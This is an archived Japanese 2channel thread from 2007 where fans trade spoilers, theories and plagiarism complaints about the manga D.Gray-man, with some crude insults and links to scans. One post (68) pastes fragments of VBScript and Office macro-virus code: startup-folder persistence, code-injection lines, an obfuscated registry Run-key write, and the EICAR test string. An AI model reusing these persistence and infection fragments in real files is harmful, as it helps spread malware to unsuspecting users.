5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【星野桂】灰色男達がバラすスレ32【D.Gray-man】

1 :名無しさんの次レスにご期待下さい:2007/01/04(木) 16:58:53 ID:99MpcDvU
D.Gray‐manのネタバレスレです
・ネタバレ師へ感謝を忘れない (バレはバレ師の意向で転載、拡散を決めること)
・随時sage進行で
・過度な馴れ合い、またそれに伴うアンカーレスは禁止 (馴れ合い目的じゃないアンカーレスはOK)
・個人サイト晒し禁止
・同人話・腐女子を含むレス禁止
・避難所は目欄等を活用し適切に誘導すること
・自治厨は一切スルー


◆tVAx/x9APAは神にもAKUMAにもなりえる者です。
基本はスルーで水・木辺りに出てきたらチヤホヤしてください。


・◆JesZ1I6ZgY、◆g0MoR0vL9I、◆5y9I88a4jY、◆Love83ohSAはAKUMAコテです。
どんなレスをされても一切構わない、レスしない。
と、いくら言っても守れない人がいるので
目障りな人は専用ブラウザを利用しNG指定
NG指定出来ない人は脳内あぼーん

上記を守れない人にはやんわりと注意
それでもあらためない人は荒らしとみなすこと

前スレ
【星野桂】灰色男達がバラすスレ31【D.Gray-man】
http://etc4.2ch.net/test/read.cgi/wcomic/1166696452/

2 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:06:29 ID:6+uXZ6Bi
∧,,∧   ぎゃあ久し振りの荒らしも糞にもならないほど刺激がなく
ミ,,・∀・ミ
ミuu_@

3 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:29:39 ID:jdgWM/q/
>>1


4 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:57:52 ID:PzKz7qNZ
紳士乙w
ちなみにうちのオカンもロシアの人だw
昔バレエやってて挫折して今はこっちで売れないモデルやってんだけど
変に気位高くてオトンは大人しい人だからオカンがうちの絶対的な権力者でこんな感じw

5 :名無しさんの次レスにご期待下さい:2007/01/04(木) 18:03:58 ID:gj/ZGpcl
>>1
乙!!
紳士も乙wwwww

6 :名無しさんの次レスにご期待下さい:2007/01/04(木) 18:05:10 ID:5D5FuqMj
>>1、紳士両方とも乙!

7 :名無しさんの次レスにご期待下さい:2007/01/04(木) 18:19:49 ID:5D5FuqMj
連レスすまんが、紳士の前作ではアレンの母さんはリナリーじゃなかったか?

8 :名無しさんの次レスにご期待下さい:2007/01/04(木) 18:59:02 ID:ertLvmaf
>>1
乙!


9 :名無しさんの次レスにご期待下さい:2007/01/04(木) 19:30:52 ID:j7roPEyL
リナリーは嫁じゃなかったのか

>>1

10 :名無しさんの次レスにご期待下さい:2007/01/04(木) 19:31:23 ID:P+lodoSd
>>1
d

グレイさんのリナリーは長女だと思う
ついでに神田も兄弟だろう
濃い家族だな

11 :名無しさんの次レスにご期待下さい:2007/01/04(木) 19:33:02 ID:OZahZN/v
東テレがこの漫画のキャラをチビキャラ化してすごいグッズを作った件について
なんだあのハンカチとストラップ

12 :名無しさんの次レスにご期待下さい:2007/01/04(木) 19:41:02 ID:OZahZN/v
http://img.store.yahoo.co.jp/I/spshop_1930_48895410

しかもスペル違う

13 :名無しさんの次レスにご期待下さい:2007/01/04(木) 20:29:06 ID:a0m8yJmC
キモイを通り越して痛いな某庭球王子アニメの道を辿らなければ良いが

14 :名無しさんの次レスにご期待下さい:2007/01/04(木) 20:45:05 ID:gj/ZGpcl
アニメグッズなんて皆こんなもんだろ
コードギアスのキーホルダーもこんなかんじだったし

15 :名無しさんの次レスにご期待下さい:2007/01/04(木) 20:49:32 ID:gcNeKvmk
>>13
そこまで昇華すれば漫画としては良いと思う(笑)

16 :名無しさんの次レスにご期待下さい:2007/01/04(木) 20:56:12 ID:Mqtg9tBZ
アニメのグッズはワンピでも何でも全部こんなんだぞ

17 :名無しさんの次レスにご期待下さい:2007/01/04(木) 21:08:50 ID:6rmhHhFC
モジバレタノム

18 :名無しさんの次レスにご期待下さい:2007/01/04(木) 21:09:42 ID:nZSEe3NB
簡易

ビュ「お兄・・・」(んーん、この戦いが終るまで・・・お兄ちゃんって呼んじゃダメだ)
  「お帰りなさい、ウンコさん。 これ・・・紙・・・」(トイレットペーパを差し出す)
ソフ「ありがとう、ビュティ。 だが俺はウンコではない」

ソフトンの得た情報では早い話あとGURAさんとかまらを倒さないと黒賭博エリアからでられないらしい、
で、捕らえた真拳を強制労働させてるGURAさんとこに乗り込む事に。
用意された乗り物は ぬ と はんぺん と ウンコ 。 みんなでウンコに載っていく。
首領パッチは新たなる力 ニュー首領パッチへの変身を練習。 なんかものっそいもっさりする。

で、強制労働所。軍艦、スズ、ギガ、田楽が反乱を起す。
我流花毛、オブジェ、サイコ、WiiリモコンヌンチャクによりGuRAさんを撃破・・・とおもいきや、グラさん真の姿に。
全ての技を相手に50倍にして返し、その刃がギガに迫る。 が寸前、その刃を受け止めた奴がいた
「田楽マン!!」
田楽「よしな・・・ お前の相手は俺がしてやんよ」

つづく

19 :名無しさんの次レスにご期待下さい:2007/01/04(木) 21:18:15 ID:YS2zrPtL
今、親がもやしがどうやって作られるのか討論中・・・


20 :名無しさんの次レスにご期待下さい:2007/01/04(木) 21:29:58 ID:n5/GhLfn
>>10
つまり、父=クロウリ 母=ジャスデビ 長男=神田 次男=ラビ 長女=リナリー 三男=アレン
って事か?長男と次男2ヶ月しか年違わないw
そして年齢不詳のチャオジーはどうしたら…

21 :名無しさんの次レスにご期待下さい:2007/01/04(木) 21:38:05 ID:6rmhHhFC
本日振り込みしましたので確認お願いします☆!(b^ー°)ボボボナンテタノムトイッテネェ

22 :名無しさんの次レスにご期待下さい:2007/01/04(木) 21:38:58 ID:ZS6bkfmt
>>19
かもすぞ

23 :名無しさんの次レスにご期待下さい:2007/01/04(木) 22:18:04 ID:352mIqiS
紳士よ…もう少し殺伐とした時に来てくれ
これじゃただの馴れ合いをよぶだけだ
>>22
まさかこのスレでこの返しを見るとはな

24 :名無しさんの次レスにご期待下さい:2007/01/04(木) 22:19:02 ID:wStx5e0P
チャオジーが方舟に乗り込んだ理由は、実は奏者の資格を持っているからだと思っているのは俺だけか?

25 :名無しさんの次レスにご期待下さい:2007/01/04(木) 22:23:11 ID:1cWIAtYL
物凄くどうでもいいんだけど、アニタの母親がクロスに惚れて教団の協力者になった
という事はクロスはアニタ親子で親子丼・・・?

26 :名無しさんの次レスにご期待下さい:2007/01/04(木) 23:13:19 ID:X4lwdIOp
紳士死ねあげ

27 :名無しさんの次レスにご期待下さい:2007/01/04(木) 23:53:15 ID:mxP0dDZg
紳士乙あげワッショイ

28 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:04:04 ID:f48JAnPV
>1と紳士乙
母さん最強だなw

29 :名無しさんの次レスにご期待下さい:2007/01/05(金) 01:40:40 ID:ndkAZ9HI
チャオジーはタマだろ

30 :名無しさんの次レスにご期待下さい:2007/01/05(金) 13:18:57 ID:R9/W/OSK
Dグレは色々な国の人がいるのだから、大げさな位お国柄を出してみたらどうだろうか

カレーしか出さないジェリー、任務中意地でもティータイムをするアレン、脇毛を剃らないリナリー、任務に失敗して切腹する神田、ティッシュを繰り返し使うミランダ、反日運動をするアジア支部
リナリーとコムイは語尾に「アル」を付ける等

31 :名無しさんの次レスにご期待下さい:2007/01/05(金) 13:21:16 ID:VPEle/wl
つまらん消えろ

32 :名無しさん次のレスにご期待下さい:2007/01/05(金) 13:22:22 ID:iKZ1K/ab
そんな漫画打ち切りだ

33 :名無しさんの次レスにご期待下さい:2007/01/05(金) 14:19:21 ID:u51ByJQ/
その国出身でも黒の教団で育ってるヤツもいるからなお国柄が消えてるなんてこともあるんじゃないか?
またはあんまり出さないようにしてるとか

34 :名無しさんの次レスにご期待下さい:2007/01/05(金) 14:44:15 ID:yjsu35e2
>>30
そうなったとしても相変わらず空気のラビ

35 :名無しさんの次レスにご期待下さい:2007/01/05(金) 15:56:20 ID:nmtXlcrF
>>30それじゃリナリーが神楽にorz

36 :すいません:2007/01/05(金) 16:26:17 ID:jmI8MgZS
紳士さんがUPしたの見るのどうすればいいんですか?
基本的なことがわかってない奴がここに・・・

誰か教えてください・・・
メ欄って何・・・?

37 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:32:25 ID:gXUgWlld
ここで氏ねばいいと思うよのAA↓

38 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:33:41 ID:MqodDdfi
           _,,,,,--―--x,
          ,,,,-‐'"゛_,,,,,,,,,、   .゙li、
     _,-'"゛,,―''゙二,、、、゙'!   .i_
   .,/`,,/,,,,ッメ''>.,,/,-゜ ,,‐` │
 _/ ,‐゙,/.ヘrニニ‐'゙ン'′,,/   |
,,i´  |、 ゙''''''゙゙_,,,-‐'" _,,-'"     .l゙
.|,   `^'''"゙゙` ._,,,-'''″      ,l゙
`≒------‐''"゛         丿
  \               ,,i´
   `ヽ、             ,,/
     `''-、,,,_.∩  _,,,,,-∩´
        //゙゙゙゙″   | |
        //Λ_Λ  | |
        | |( ´Д`)// <うるせぇ、キャベツぶつけんぞ
        \      |
          |   /
         /   /
     __  |   |  __
     \   ̄ ̄ ̄ ̄ ̄   \
     ||\            \
     ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||

39 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:39:36 ID:y5y4eXoZ
19世紀あたりなんて、どこの国の女も腋毛処理してなかったんじゃねーの?

40 :名無しさんの次レスにご期待下さい:2007/01/05(金) 17:03:03 ID:QdOyzwaI
>>23
もやしもんぐらいで驚くなよ低脳

41 :名無しさんの次レスにご期待下さい:2007/01/05(金) 17:06:55 ID:c7AqYRPc
http://blog.livedoor.jp/s31040728/archives/51411544.html

42 :名無しさんの次レスにご期待下さい:2007/01/05(金) 17:13:57 ID:c7AqYRPc
http://blog.livedoor.jp/s31040728/archives/51411544.html

43 :名無しさんの次レスにご期待下さい:2007/01/05(金) 18:02:28 ID:kHVjAzyn
ネタバレ

http://l.pic.to/aqom4

44 :名無しさんの次レスにご期待下さい:2007/01/05(金) 19:22:00 ID:nmtXlcrF
>>43乙です。やっぱりチャオジーが未覚醒ノアだったのか。

45 :名無しさんの次レスにご期待下さい:2007/01/05(金) 21:02:52 ID:8STGvrn7
>>30
>反日運動をするアジア支部
アジア支部訪問したら神田だけ締め出しかw

46 :名無しさんの次レスにご期待下さい:2007/01/05(金) 21:20:22 ID:ti6Ixhot
>>43
うわ…きめぇ
腐女子死ねよ、これアレンと神田か?

47 :名無しさんの次レスにご期待下さい:2007/01/05(金) 21:29:00 ID:tJvUOaRK
自演くせえ( ´,_ゝ`)

48 :名無しさんの次レスにご期待下さい:2007/01/05(金) 21:31:54 ID:MqodDdfi
PC許可されてないしな

49 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:19:17 ID:A1ZXSaKl
紳士死ねあげ

50 :名無しさん次のレスにご期待下さい:2007/01/06(土) 00:09:25 ID:lh96U+KZ
ていうかさ、最近この手の画像おおいよな。出演者が撒いてんの??

51 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:11:31 ID:QBsWwYBo
>>50
全力でスルーしろ

52 :名無しさん次のレスにご期待下さい:2007/01/06(土) 00:15:04 ID:lh96U+KZ
すいません

53 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:24:08 ID:b0lW43B5
ついでに紳士もスルーしろ
あんなレベルの低いコラ作って悦ってんじゃねーよ。
俺でもできるわあんなの

54 :名無しさん次のレスにご期待下さい:2007/01/06(土) 00:25:36 ID:lh96U+KZ
すいませんw←アッ

55 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:39:09 ID:NL2MB5uo
なんだこの流れ…冬休みが終わったころには普段通りになってることを祈る

56 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:07:32 ID:g4QCEUab
U

57 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:08:21 ID:g4QCEUab
普通のネタバレはないのか?

58 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:14:54 ID:U+lWe+wy
今週のネタバレってもう来てますか?
逃した;;

59 :名無しさんの次レスにご期待下さい:2007/01/06(土) 03:16:46 ID:cwPE/TAU
これだから冬休み厨は…
さっさと消えろ
合併号だって言ってんだろ

60 :名無しさんの次レスにご期待下さい:2007/01/06(土) 12:02:42 ID:+qCJKu7X
今年は痛いgdgdギャグ入れずに常にシリアス路線で描いてもらいたい。
つか今の展開見てると千年公の予想通り奏者=クロスな悪寒がする。
今の☆野に新キャラ考える余裕なさそう。

61 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:47:11 ID:KisE3fD6
>60
意外とアレンだったりする罠

62 :名無しさんの次レスにご期待下さい:2007/01/06(土) 14:06:56 ID:jH52p23d
クロスが奏者でもいいけど、今の☆野がクロスを魅力的にかけるかが問題
下手したら只のDQNおじさんになる予感
アレンが奏者だった場合、只でさえ色んな要素を加えすぎてキャラが安定してないのに
更にカオスになるんじゃないかと。
奏者の件だけじゃなく、☆野はキャラに色んな要素を持たせすぎなんじゃないか?

63 :名無しさんの次レスにご期待下さい:2007/01/06(土) 14:50:10 ID:Hs2nRuoN
でもありうる。

64 :名無しさんの次スレにご期待下さい:2007/01/06(土) 14:54:18 ID:mPschxVs
>>60
オナリーが奏者だと思ってる
キャメが着てたキャミワンピとオナリーが精神的にww襲われたwww
ときに着てたキャミワンピのデザイン同じだったからな
☆野だから考えなしにやっただけかも試練が
まぁオナリーが奏者だった場合どういう経由で譲渡されたのかで
またオナリー劇場開催だろ、ダークブーツで走者と奏者かけてるとか苦しい言い訳wktk

65 :名無しさんの次レスにご期待下さい:2007/01/06(土) 14:55:00 ID:Hs2nRuoN
リナリー奏者はありえないと思う。

66 :名無しさんの次レスにご期待下さい:2007/01/06(土) 15:22:53 ID:QVdOuh+9
アンチの妄言はほっとけよ

67 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:46:48 ID:+cgxkJ7n
クロス奏者で特に問題ないでしょ。

伯爵の言葉見る限り、奏者の資格を持った裏切り者のノアと面識が
あったのがクロスなんだし。

とりあえずジャスデビ戦がダラダラすぎなのでさっさとクロス乱入きぼんぬ。

68 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:11:58 ID:xu03MlP7
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


69 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:30:05 ID:VXGdXKNy
じゃあ、もとの奏者はマナで

70 :名無しさんの次レスにご期待下さい:2007/01/06(土) 18:27:54 ID:+qCJKu7X
>>69神田の「あの人」の可能性もある。

71 :名無しさんの次レスにご期待下さい:2007/01/06(土) 18:32:01 ID:+cgxkJ7n
神田の「あの人」は2巻のうしろのヤツだろ。

72 :名無しさんの次レスにご期待下さい:2007/01/06(土) 18:33:10 ID:jH52p23d
ティキが神田に無反応だったから「あの人」奏者はないんじゃないか?

73 :名無しさんの次レスにご期待下さい:2007/01/06(土) 20:02:36 ID:xi5u9ZFe
ティキが奏者が誰なのか知ってるとは思えないな
ノアとして覚醒したのがいつなのかによる

74 :名無しさんの次レスにご期待下さい:2007/01/06(土) 20:06:58 ID:+cgxkJ7n
知ってるのは(感じ取れるのは)ロードだろう。確実に。
クロスが船に潜入してるのを匂わせたのもロードだったし。

75 :名無しさん次のレスにご期待下さい:2007/01/06(土) 20:12:58 ID:lh96U+KZ
2巻のうしろのやつって??あの人でてたっけ??詳細キボン

76 :名無しさんの次レスにご期待下さい:2007/01/06(土) 20:20:29 ID:+cgxkJ7n
2巻のうしろのヤツ→単行本2巻の表紙を見れば猿でも分かる。

あの人、2巻で神田がレベル2に斬られた後にいったセリフ。

あの人は神田の不死の能力の源である梵字の刺青を入れた人なんだろうな。

77 :名無しさん次のレスにご期待下さい:2007/01/06(土) 20:23:07 ID:lh96U+KZ
表紙のお面の人のことか??トントン

78 :名無しさんの次レスにご期待下さい:2007/01/06(土) 21:26:19 ID:ATlVTSGU
アレは土爺と空夜のアリアのタイトルから描いた爺のイメージ画かと思ってた

79 :名無しさんの次レスにご期待下さい:2007/01/06(土) 22:28:50 ID:+qCJKu7X
表紙の絵って今後の伏線になってたりするもんなのか。
もしそうなら5巻表紙のロードが座ってたデカい人形の首(?)と7巻表紙のコムイが抱っこしてる、フード被った赤ん坊(?)の意味が気になる。

80 :名無しさんの次レスにご期待下さい:2007/01/06(土) 22:50:13 ID:PfNobX+n
キャメタンが座ってたのは人間の生首?((;゜Д゜))))ガクブル

81 :名無しさんの次レスにご期待下さい:2007/01/06(土) 23:32:25 ID:+cgxkJ7n
5巻と7巻はただカッコ付けだと思う。
確かにカッコ良かったし。特に7巻。

2巻の後ろの人物はカッコ付けにしては微妙だしな。

82 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:58:38 ID:KgzIxPUm
ここ最近扉絵がキモいのは何で?
オナリーとかキモすぎて射精した

83 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:02:33 ID:PJMTzCMr
ロードの座ってた首は、なんか方舟かどっかで伯爵がティキとかに色々説明してた時に
なんか部品みたいな感じで出てきてなかった?
たしか最新刊の最初の方の話に載ってたと思う。

84 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:03:37 ID:8Z4JxI0g
>>82

  /\___/\
/        ::\
|  ─   ─   | それは あなたのハートが腐っているからですよ
| (●), 、 (●)、 |
|  ,,ノ(、_, )ヽ、,, .::::|
\   r‐=‐、  .:::/
/`ー `ニニ´一''´ \

85 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:15:37 ID:thmoYy1I
>>82
別にキモくないぞ。

86 :名無しさんの次レスにご期待下さい:2007/01/07(日) 02:41:34 ID:j/2LN9SE
で、いつになったら冬休みは終わるんだ?

87 :名無しさんの次レスにご期待下さい:2007/01/07(日) 03:49:10 ID:jolfvQOt
11巻は4月発売かようやく普通のペースに戻ったな

88 :名無しさんの次レスにご期待下さい:2007/01/07(日) 09:36:53 ID:Ha5MGbYv
>>83 9巻確認したら第78夜でそれっぽいの方舟内にいた>5巻表紙の生首。
鰤でマユリがバン解の時に出す地蔵に似てる。

89 :名無しさんの次レスにご期待下さい:2007/01/07(日) 10:53:16 ID:pFhrK8BB
>>36
ttp://up.viploader.net/src/viploader67350.zip.html

メル欄はメール欄に書いてある文字のこと。
よってパスはsage

90 :名無しさんの次レスにご期待下さい:2007/01/07(日) 14:44:01 ID:3L5nVLbc
>>78
たぶんそれでいい

91 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:19:45 ID:gCH0fLHt
>>89
うるっせぇなROMれよ転載厨のくせに!
犯すぞああっ!?

92 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:58:43 ID:RxYvklp9
ヒッ 怖っ

93 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:04:49 ID:XyXVg4a5
>>89
いい奴〜wwwww
好かれるよ?wwww

94 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:18:55 ID:LD9fVFoh
【今度はJING】最新号の06・07合併号でDグレの盗作発覚【また盗作】

196 名前:名無しさんの次レスにご期待下さい[sage] 投稿日:2007/01/07(日) 23:05:37 ID:lOoCzesk
今週だけで、エギュベルの服装、音符と同化したフキダシ、音符の出る銃、出血大サービス、と
こんなにJINGからパクるってすごいよな。普通の人間なら出来ないと思う。

http://p.pita.st/?hzwovz5b ←特にこれが真っ黒
音符の台詞

出血大サービス
http://p.pita.st/?m=or2ulsx3

服装の盗作
ttp://ranobe.com/up/src/up163457.jpg
ttp://ranobe.com/up/src/up163458.jpg

95 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:36:05 ID:XZhYwuWH
>>94
いろんなスレに張ってるな。そないに暇なんかな?

96 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:58:11 ID:CW7SxotX
>>94
なんていうか、パクリとか二の次になってきた気がする。
今までの見て、ここまでスパッとやられるとなぁ…。

97 :名無しさんの次レスにご期待下さい:2007/01/08(月) 02:01:29 ID:j9lmxHqM
ジンパクってんのは薄々気付いてたが気にすることでもない。
そんなことで熊倉の名に傷がつく訳でもなく、レベルも全く落ちない。
それに星野は他漫画を参考にしなきゃ描けないんだからしょうがない。

98 :名無しさんの次レスにご期待下さい:2007/01/08(月) 02:15:23 ID:rQnP/Cyd
>>97をみてジンファンて寛大っつか鷹揚でいいなあと思った。

99 :名無しさんの次レスにご期待下さい:2007/01/08(月) 03:23:12 ID:OZ1x87KW
他スレにまで出張して貼りまくるのがこの漫画のアンチのクオリティ
関係スレ内だけ荒らしとけばいいのに…
星野パクリなんて知らしめるまでもなく2chじゃ共通認識

100 :名無しさんの次レスにご期待下さい:2007/01/08(月) 10:16:13 ID:rrsL31mP
100!

101 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:29:12 ID:RZMKEaJE
101!!
我等も寛大になろうぞ


102 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:53:33 ID:7q1qcIYf
JINGスレでも盗作が指摘されてたけどな
ジャンプを読んだJING住人によって

103 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:17:59 ID:pMPDCbTP
音符のフキダシのデザインが格好良かったから、星野もこういうセンスはあるんだから自分でちゃんと考えればいいのにと思ってただけに…
これもパクリなのかよ
もうどうしようもないな

104 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:48:59 ID:c84+/LVI
もう何もかもどうでもいい
今更だよ諸君
知欠と師匠と一緒にパクリーズ結成すればいいよ

105 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:15:55 ID:oMIB8Qa3
おいこら
知欠と師匠はパクりしてないだろ

106 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:19:44 ID:Hntiq9fe
師匠誰?

107 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:28:43 ID:pK81rVfg
>>105
知欠のパクリ知らねぇの?

108 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:13:54 ID:RD+KtzkO
知欠のパクりについてはググッた方が早い

あと師匠は久保帯人の事だよ

109 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:15:55 ID:pK81rVfg
それならわかりやすくオサレ師匠と言ってくれよ

110 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:49:44 ID:j9lmxHqM
スマヌ師匠

111 :名無しさんの次レスにご期待下さい:2007/01/08(月) 18:10:54 ID:rrsL31mP
つ空知。

112 :名無しさんの次レスにご期待下さい:2007/01/08(月) 18:49:07 ID:c84+/LVI
>>111
空知はパロじゃん?

113 :名無しさんの次レスにご期待下さい:2007/01/08(月) 20:54:24 ID:rrsL31mP
>>112便所ネタは真っ黒だったorz
スレチスマソ。


114 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:12:20 ID:c84+/LVI
そうか

ジャンプ\(^O^)/

115 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:00:03 ID:VBkXeqHu
やっと四月に十巻か。いつみても九巻は最終巻みたいな表紙だな

116 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:29:03 ID:CW7SxotX
ミランダの絵を没って何故Y氏は集合イラストにさせたのかが分からん。
つかそろそろY氏担当交代してもいいんじゃないか?まだマシになる気がするんだが…。

117 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:32:24 ID:+3dNYiAx
Y氏って編集者として有能なの?

118 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:34:36 ID:V1TADpXm
デスノ2部担当してたってどっかのスレで見た気が

119 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:58:48 ID:AZszd2n8
いやむしろこのスレで見た

120 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:23:11 ID:c84+/LVI
Y氏はデスノ・Dグレ・ハンタだ

121 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:50:03 ID:saOdtmE1
今更だけど、今週は★野的には
「まさか…!ギャグだと思ってたのに本当に二人合わせてジャスデビだったなんて…!」

て、いう感じでいいのか?

122 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:52:49 ID:GTXFD49Y
確かにミランダ表紙は見たかった


123 :名無しさん次のレスにご期待下さい:2007/01/09(火) 00:48:30 ID:ZAyv0/2k
ていうか順番的にそろそろミランダ表紙アリだと思うんだけどなんでボツかな。。。
Y氏ってかなり自分の意見押し付けすぎジャマイカ??ほくろから毛が生えてるのは
まぁほっといてやるけど

124 :名無しさんの次レスにご期待下さい:2007/01/09(火) 01:55:29 ID:6DPUNqBW
>>123
押し付けってかまぁ星野は一応連載初心者だしな
連載経験者よりも意見は押し気味なんだろ

125 :名無しさんの次レスにご期待下さい:2007/01/09(火) 02:08:25 ID:UKxacyxn
☆野絵柄戻ってきたか…?

126 :名無しさんの次レスにご期待下さい:2007/01/09(火) 08:36:16 ID:gzqk9hYj
つかもう雰囲気としては、
ハンタ原稿貰えないし話に関与できてなさそう(冨樫だから…)だから、Dグレで押し気味の意見連発してるように見えなくも無い。
デスノは原作者いるしあんま関与できてなさそうだし…。
>>125
今週号は一応シリアスだし、アレンの表情とかも微妙に戻っていた気がする。

127 :名無しさんの次レスにご期待下さい:2007/01/09(火) 08:54:16 ID:wzTos2No
もしかしてジャスデビ戦のあのノリってJINGのノリを目指してたのか?
ギャグが多い以前に雰囲気になんか似たものを感じた。
しかしそうなら失敗だな。星野先生が描いても不快しか感じなかった。

128 :名無しさんの次レスにご期待下さい:2007/01/09(火) 09:41:17 ID:lWb8451Z
雰囲気はちーとも似てなかったと思うけどな。
不快なギャグだけ印象的。

129 :名無しさんの次レスにご期待下さい:2007/01/09(火) 12:04:13 ID:DR3QcSW4
>>123
吉田は基本的にストーリー自体にはあまり口出ししないって昔取材で言ってたぞ

130 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:00:59 ID:7RsHLFHC
ダメ出しくらうとか怒られるとか星野が書いてた気がする
ストーリーに口出ししないなら休載を怒るとかか?

131 :名無しさん次のレスにご期待下さい:2007/01/09(火) 14:02:57 ID:ZAyv0/2k
あまりって事は本人が思ってるより口出ししてるだろうから、普通に口出ししてんじゃない

132 :名無しさんの次レスにご期待下さい:2007/01/09(火) 14:31:37 ID:DR3QcSW4
ストーリーじゃなくて構図とかかもな
戦闘シーンとか分かりづらいし

133 :名無しさんの次レスにご期待下さい:2007/01/09(火) 15:38:02 ID:ulr3nrU6
ミランダの表紙をボツにしたのも吉田だしある程度は口出ししてるんじゃ無いかな

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)